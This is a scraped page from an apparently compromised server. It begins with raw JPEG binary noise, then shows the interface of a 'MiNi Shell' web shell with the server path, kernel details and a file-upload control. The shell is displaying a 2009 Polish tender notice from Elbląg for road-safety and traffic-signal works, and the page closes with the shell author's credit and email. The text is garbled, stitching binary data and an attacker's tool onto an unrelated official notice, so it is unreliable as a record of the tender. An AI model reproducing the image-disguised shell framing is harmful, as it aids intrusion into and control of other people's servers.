JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090521/160832-N-2009.html

<p class="kh_header"><b>Elbląg: Poprawa bezpieczeństwa ruchu drogowego na wybranych ciągach dróg publicznych w mieście Elblągu</b><br>
<b>Numer ogłoszenia: 160832 - 2009; data zamieszczenia: 21.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 235 35 36, 055 239 31 25, faks 055 235 35 55, 055 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa bezpieczeństwa ruchu drogowego na wybranych ciągach dróg publicznych w mieście Elblągu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
	
Wykonanie usługi poprawiającej bezpieczeństwo ruchu drogowego na wybranych ciągach dróg publicznych w mieście Elblągu.

Przedmiot główny:	Nazewnictwo wg CPV: usługi budowlane
	
2.	Przedmiot zamówienia obejmuje:
1)	zaprojektowanie lokalizacji i wykonanie montażu elementów bezpieczeństwa ruchu drogowego na wybranych ciągach ulic w mieście Elblągu zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003 r. Nr 220, poz. 2181 z późn. zm.),
2)	zaprojektowanie i wykonanie przebudowy sygnalizacji świetlnych w mieście Elblągu na skrzyżowaniach ulic: ul. Brzeska- Browarna- Trasa Unii Europejskiej, Płk. Dąbka- Piłsudskiego,  Grunwaldzka Mickiewicza, Grunwaldzka-Żeromskiego, Grunwaldzka- Lotnicza, Robotnicza- Brzeska- Piłsudskiego, Robotnicza-Okrzei poprzez dostosowanie w/w sygnalizacji do rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r. Nr 220, poz. 2181 z późn. zm.).

3.	Zakres zamówienia obejmuje:
a)	montaż progów zwalniających w łącznej ilości 7 szt. na wybranych ciągach ulic tj: ul. Dąbrowskiego (szt. 1), Szczyglej (szt. 2), Łowickiej (szt. 1), Grochowskiej (szt. 2), Żyrardowskiej (szt. 1) z uwzględnieniem następujących warunków:
-	progi wykonane muszą być z trwałych elementów z tworzyw sztucznych w kolorystyce czarno/żółtej i składać się z elementów łatwych do montażu na podłożu bitumicznym lub betonowym, zaleca się stosować elementy pojedyncze o wym. 900x500x70. Mocowanie elementów odbywać się będzie za pomocą śrub kotwiących.
Na zastosowany materiał Wykonawca  musi posiadać aprobatę techniczną.
-	zakup i montaż oznakowania pionowanego progów zwalniających (łącznie 14 słupków ze znakami)
Należy zastosować znaki o wymiarach małych na ciągach dróg gminnych i średnie na drogach powiatowych z użyciem folii I gen, na podkładach z blachy  stalowej malowanej proszkowo, o krawędziach giętych na całym obwodzie.     
b)	montaż progów płytowych z przejściem dla pieszych w łącznej ilości 2 szt. na wybranych ciągach: ul. Kopernika (szt. 1) i Daszyńskiego (szt. 1) z uwzględnieniem następujących warunków:  
-	progi płytowe wykonane muszą być z tworzyw sztucznych, przejście o szer. 4m w kolorystyce biało/czerwonej, pasy najazdowe białe. 
Mocowanie elementów odbywać się będzie za pomocą śrub kotwiących.
Na zastosowany materiał Wykonawca  musi posiadać aprobatę techniczną.
-	demontaż istniejących progów zwalniających (materiał z rozbiórki z ul. Kopernika do dyspozycji Zamawiającego)
c)	oznakowanie łuków poziomych na ciągach dróg wojewódzkich znakami dwustronnymi typu U-3e z zastosowaniem na obwodzie tła fluoroscencyjnego (o wym. 900X900):
-	ul. Łęczycka 15 szt. znaków U-3e (trzy łuki)
-	ul. Mazurska 5 szt. znaków U-3e (jeden łuk) 
Znaki o wymiarach średnich z użyciem folii I gen i folii fluoroscencyjnej min. II gen, na podkładach z blachy stalowej malowanej proszkowo, o krawędziach giętych na całym obwodzie.
d)	oznakowanie niekonwencjonalne 20 szt. drzew na łukach poziomych na drodze powiatowej (ul. Fromborska- Jelenia Dolina) tabliczkami odblaskowymi, biało/czerwonymi, o wym. 200 X 300.  
e)	skrzyżowanie: Browarna- Brzeska- Trasa Unii Europejskiej:
-	opracowanie i wdrożenie oprogramowania sterownika  sygnalizacji  świetlnej uwzględniającego wydzielenie fazy ruchu dla tramwaju
f)	skrzyżowanie: Płk. Dąbka- Piłsudskiego
-	opracowanie i wdrożenie oprogramowania sterownika  sygnalizacji  świetlnej uwzględniającego wydzielenie fazy lewoskrętu dla pojazdów skręcających w lewo na wlotach ul. Piłsudskiego
-	montaż 2 szt. dodatkowych sygnalizatorów kierunkowych nad pasami lewoskrętu z ul. Piłsudskiego
-	dostosowanie istniejącej instalacji kablowej oraz sterownika dla spełnienia ww warunków
Z uwagi na istniejący sterownik należy zastosować przy jezdni sygnalizatory żarowe a nad jezdnią diodowe. Zastosowane sygnalizatory powinny mieć śr. 300 mm i ekrany kontrastowe (owalne).
g)	skrzyżowania: Grunwaldzka-Mickiewicza, Grunwaldzka-Żeromskiego, Grunwaldzka-Lotnicza,                         Robotnicza- Brzeska- Piłsudskiego, Robotnicza-Okrzei
-	montaż sygnalizatorów dźwiękowych przy sygnalizatorach typu S-5 w następującej ilości: 8+8+8+8+6= 38 szt.
h)	skrzyżowanie: Płk. Dąbka- Cicha- Brzozowa (4+2), Płk. Dąbka- Pionierska (6+2), Płk. Dąbka- Piłsudskiego (6+2) Płk. Dąbka- Węgrowska (4+2)
-	wymiana 20 szt. sygnalizatorów typu S-1,S-3 o śr. 200mm na sygnalizatory o śr. 300 mm (zlokalizowane przy jezdni)
-	sygnalizatory montowane nad jezdniami szt. 8 w ciągu ul. Płk. Dąbka należy wyposażyć w ekrany kontrastowe (zaleca się stosować owalne) oraz wkładki typu LED.

Zakres zamówienia zawarty jest w programach funkcjonalno - użytkowych określonych w:
1)	załączniku nr 1 do umowy - Zaprojektowanie lokalizacji i montaż elementów brd na wybranych ciągach ulic w mieście Elblągu, stanowiącym ZAŁĄCZNIK NR 3 do SIWZ.
2)	załączniku nr 2 do umowy - Zaprojektowanie i wykonanie przebudowy sygnalizacji świetlnych w mieście Elblągu - w zakresie poprawy brd na skrzyżowaniach ulic: Brzeska - Browarna - Trasa Unii Europejskiej, Płk. Dąbka - Piłsudskiego, Grunwaldzka-Mickiewicza, Grunwaldzka-Żeromskiego, Grunwaldzka-Lotnicza, Robotnicza- Brzeska- Piłsudskiego, Robotnicza- Okrzei, stanowiącym ZAŁĄCZNIK NR 3 do SIWZ.

4.	Zamawiający wymaga, aby Wykonawca udzielił 24 miesięcy gwarancji liczonej od daty odbioru usług.

5.	Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy:
Zamawiający przewiduje zmianę postanowień umowy w przypadku:
a)	zmiany przepisów prawnych dotyczących stawki podatku VAT,
b)	zmiany przepisów prawnych na podstawie których realizowana jest umowa,
c)	wystąpienia działania nieprzewidzianej siły wyższej.
	
6.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.

7.	Zamawiający informuje, że przewiduje udzielenie zamówień uzupełniających w wysokości 50% zamówienia podstawowego, polegających na montażu urządzeń bezpieczeństwa ruchu drogowego i urządzeń sygnalizacji świetlnej.

Zamawiający wymaga złożenia oświadczenia wynikającego z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień publicznych o treści:
Zgodnie z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień publicznych oświadczam, że oferowane usługi spełniają wymagania określone przez Zamawiającego w Specyfikacji Istotnych Warunków Zamówienia. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.31.50.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełniający warunki art. 22 ust. 1 tj. Wykonawcy, którzy:

1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
Warunkiem udziału w postępowaniu jest:
a)	wykonanie w sposób należyty w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia minimum 1 usługi polegającej na zaprojektowaniu i wykonaniu rozbudowy sygnalizacji świetlnej w zakresie poprawy brd na skrzyżowaniu ulic w mieście powyżej 100 000 mieszkańców o łącznej wartości usług minimum 100 000,00 zł (brutto)

b)	dysponowanie osobami, które będą wykonywać zamówienie posiadającymi kwalifikacje niezbędne do wykonywania tego zamówienia, tj. dysponowanie:
-	co najmniej 1 osobą posiadającą wymagane uprawnienia budowlane do projektowania (zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane - tj. DZ. u. z 2006 r. Nr 156, poz. 1118 z późn. zm.) w zakresie objętym niniejszym zamówieniem i która zaprojektowała co najmniej jedną sygnalizację świetlną wielofazową
oraz
-	co najmniej 1 osobą posiadającą wymagane uprawnienia wykonawcze do kierowania robotami w  zakresie objętym niniejszym zamówieniem oraz co najmniej 3 letnie doświadczenie przy nadzorowaniu wykonywania robót polegających na budowie, przebudowie lub montażu urządzeń sygnalizacji świetlnej
Wskazane przez Wykonawcę osoby muszą być członkami Izby Inżynierów Budownictwa.
Zamawiający informuje, że Wykonawca może wskazać jedną osobę, która posiada wymagane uprawnienia budowlane do projektowania i wymagane uprawnienia wykonawcze do kierowania, o ile spełnia powyższe warunki.

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

1) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 1. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt. VI. ppkt 1.2. SIWZ
2) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt. VI. ppkt 1.3. SIWZ
Przy ocenie spełnienia tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt b) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt. VI. ppkt 1.4., 1.5. i 1.6. SIWZ
4) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.
5) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 4. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI. SIWZ, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga dostarczenia:
-    zgodnie z pkt VI. ppkt 1.1. SIWZ - Oświadczeń wynikających z art. 22 i 24 ustawy Prawo zamówień publicznych
Uwaga:
a)	Treść wymaganych Oświadczeń Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
-  zgodnie z pkt VI. ppkt 1.2. SIWZ - Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
-   zgodnie z pkt VI. ppkt 1.3. SIWZ - Wykazu wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenie dokumentów potwierdzających, że te usługi zostały wykonane należycie.
Uwaga:
a)	W wykazie należy wymienić usługi potwierdzające spełnienie przez Wykonawcę warunku określonego w Sekcji III.2) ppkt 2.a) ogłoszenia.
b)	W przedmiocie wykazywanej usługi należy podać, czy usługa dotyczyła zaprojektowania i wykonania rozbudowy sygnalizacji świetlnej w zakresie poprawy brd na skrzyżowaniu ulic w mieście powyżej 100 000 mieszkańców:
c)	Wykaz usług należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 4 do SIWZ WYKAZ USŁUG.
d)	Dla usług wymienionych w wykazie należy załączyć dokumenty potwierdzające, że usługi te zostały wykonane należycie.
e)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) ppkt 2.a) ogłoszenia.

-   zgodnie z pkt VI. ppkt 1.4. SIWZ - Wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
Uwaga:
a)	Na potwierdzenie spełniania warunku określonego w Sekcji III.2) ppkt 2.b) ogłoszenia w wykazie osób należy wymienić osoby, które będą uczestniczyć w wykonywaniu zamówienia, którymi Wykonawca dysponuje lub będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.
b)	Wykaz osób należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 5 do SIWZ WYKAZ OSÓB.
c)	Dla wykazywanej osoby posiadającej wymagane uprawnienia budowlane do projektowania (zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane - tj. DZ. u. z 2006 r. Nr 156, poz. 1118 z późn. zm.) w zakresie objętym niniejszym zamówieniem należy podać doświadczenie polegające na zaprojektowaniu co najmniej jednej sygnalizacji świetlnej wielofazowej,
d)	Dla wykazywanej osoby posiadającej wymagane uprawnienia wykonawcze do kierowania robotami w zakresie objętym niniejszym zamówieniem należy podać liczbę lat doświadczenia przy nadzorowaniu wykonywania robót polegających na budowie, przebudowie lub montażu urządzeń sygnalizacji świetlnej
e)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.

-  zgodnie z pkt VI. ppkt 1.5. SIWZ - Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób Wykonawca wskazał osoby, którymi będzie dysponował.
Uwaga:
a)	Dokumenty składa ten Wykonawca, który w wykazie osób wskazał osoby, którymi będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.

-  zgodnie z pkt VI. ppkt 1.6. SIWZ - Dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Uwaga:
a)	Dla osób wymienionych w wykazie osób, o którym mowa w pkt VI. ppkt 1.4. SIWZ, należy złożyć z ofertą dokumenty: decyzję o nadaniu wymaganych uprawnień oraz aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty Wykonawcy składają wspólnie.

Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
UWAGA:
1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 1. UWAGI zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125 
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2009 godzina 09:30, miejsce: Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125
82-300 Elbląg ul. Łączności 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.
2. Dotyczy Sekcji II.2) ogłoszenia CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA
data rozpoczęcia: data udzielenia zamówienia

Creat By MiNi SheLL
Email: jattceo@gmail.com